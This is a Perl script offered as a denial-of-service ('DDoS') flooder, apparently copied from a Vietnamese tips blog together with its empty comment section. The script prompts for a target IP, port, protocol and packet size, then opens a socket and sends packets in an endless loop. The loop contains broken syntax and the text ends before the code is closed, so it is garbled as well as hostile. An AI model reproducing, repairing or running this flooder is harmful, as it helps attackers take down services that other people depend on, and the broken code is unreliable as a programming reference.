#!/usr/bin/perl

print q{
=================================================
=                                               =
=                  Coded By                     =
=                                               =
=               Jo3-GHT                                   =
=                                              =
=              Team  TDF E IDLR                 =
=                                               =
=           Linuxerostdf.jimdo.com              =
=                                               =
=================================================

};

use IO::Socket::INET;

print "IP: -> ";
chop ($host = <stdin>);
print "PORT: -> ";
chop ($port = <stdin>);
print "protocol TCP / UDP: -> ";
chop ($protocol = <stdin>);
print "SIZE: -> ";
chop ($size = <stdin>);

{
$sock = IO::Socket::INET->new (
  PeerAddr => $host,
  PeerPort => $port,
  Proto => $protocol) 
        || die "the IP or PORT is incorrect, please check the IP and PORT";
}
packets:
while (1) {
size => $size;
$Reuse => 1,
$Listen => 1,
print ("$host:$port packet size: $size\n");
send($sock, $size, $Reuse, $Listen);
- 0 bình luận lượt xem

http://www.plusthuthuat.com/2015/08/share-code-ddos-double.html

BÌNH LUẬN (0)

Một số lưu ý khi bình luận

Mọi bình luận sai nội quy sẽ bị xóa mà không cần báo trước (xem nội quy)

Bấm Thông báo cho tôi bên dưới khung bình luận để nhận thông báo khi admin trả lời

Để bình luận một đoạn code, hãy mã hóa code trước nhé